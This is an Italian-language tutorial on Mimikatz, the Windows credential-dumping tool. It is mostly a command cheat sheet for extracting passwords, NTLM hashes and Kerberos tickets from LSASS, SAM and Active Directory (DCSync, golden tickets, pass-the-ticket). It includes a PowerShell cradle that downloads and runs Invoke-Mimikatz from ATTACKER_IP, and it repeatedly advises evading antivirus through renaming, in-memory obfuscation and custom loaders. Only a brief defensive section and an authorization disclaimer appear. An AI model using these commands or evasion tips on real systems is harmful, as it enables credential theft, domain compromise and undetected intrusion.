Tutorials

Guida Approfondita su Mimikatz

Mimikatz è uno dei tool più noti e potenti nel panorama del penetration testing e del red teaming per l'estrazione di credenziali da sistemi Windows. Sviluppato da Benjamin Delpy, consente il dumping

#exploitation#post-exploitation#windows

Guida Approfondita su Mimikatz

Introduzione

Mimikatz è uno dei tool più noti e potenti nel panorama del penetration testing e del red teaming per l'estrazione di credenziali da sistemi Windows. Sviluppato da Benjamin Delpy, consente il dumping di password in chiaro, hash NTLM, ticket Kerberos e molto altro. Viene utilizzato in contesti di post-exploitation, privilege escalation e movimento laterale.

Attenzione: l’uso di Mimikatz è altamente invasivo e spesso rilevato dagli antivirus. Va eseguito solo in ambienti controllati o autorizzati.

Caratteristiche principali

  • Estrazione di password in chiaro da LSASS
  • Dump di hash NTLM, ticket Kerberos, certificati
  • Pass-the-Hash e Pass-the-Ticket
  • Golden e Silver Ticket
  • Manipolazione di logon session
  • Interazione con Credential Manager

Download e Preparazione

  • Versione compilata: disponibile nella cartella Win32 o x64 a seconda dell’architettura

Esecuzione

bash
mimikatz.exe

Per evitare detection:

  • Rinominare l’eseguibile
  • Offuscare in memoria
  • Usare loader custom in PowerShell o Cobalt Strike

Comandi di Base

Una volta avviato:

powershell
privilege::debug       # Richiesto per molte funzioni
log mimikatz.log        # Log dell'output su file
sekurlsa::logonpasswords  # Estrae credenziali da LSASS

Moduli Principali

sekurlsa

Opera sulla memoria del processo LSASS per ottenere:

  • Password in chiaro
  • Hash NTLM
  • Ticket Kerberos
powershell
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::ekeys

lsadump

Dump di hash da SAM e NTDS:

powershell
lsadump::sam
lsadump::lsa /inject
lsadump::dcsync /user:Administrator

kerberos

Manipolazione di ticket Kerberos:

powershell
kerberos::ptt ticket.kirbi    # Pass-the-ticket
kerberos::golden ...          # Golden ticket

misc e crypto

Recupero certificati, chiavi private e interazione con Credman:

powershell
misc::memssp
crypto::certificates /export
credman

Utilizzo con PowerShell (Invoke-Mimikatz)

Per esecuzione in memoria:

powershell
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-Mimikatz.ps1')
Invoke-Mimikatz

Tecniche Offensive

  • Dump credenziali dopo privilege escalation
  • DCSync per emulare un Domain Controller e ottenere hash da AD
  • Golden Ticket per persistenza nel dominio
  • Pass-the-Hash/Ticket per movimento laterale

Esempio: Dump credenziali con mimikatz

powershell
privilege::debug
sekurlsa::logonpasswords

Output tipico:

bash
Username : Administrator
Password : P@ssw0rd123
Domain   : LABDOMAIN

Contromisure Difensive

  • Abilitare Credential Guard e LSA Protection
  • Segmentare l’accesso privilegiato
  • Monitorare accessi a LSASS
  • Disabilitare l’amministratore locale
  • Logging avanzato con Sysmon + SIEM

Rilevamento

  • Mimikatz è fortemente signature-based: AV/EDR lo bloccano facilmente
  • Offuscare, usare loader personalizzati o strumenti alternativi (es. Rubeus)

Risorse Utili

Conclusione

Mimikatz è una delle armi più potenti per il post-exploitation in ambienti Windows. Tuttavia, la sua potenza è direttamente proporzionale al rischio operativo che comporta. Deve essere utilizzato con estrema cautela, sempre in contesti autorizzati e controllati, preferibilmente con tecniche di esecuzione in memoria per ridurre il footprint e la detection.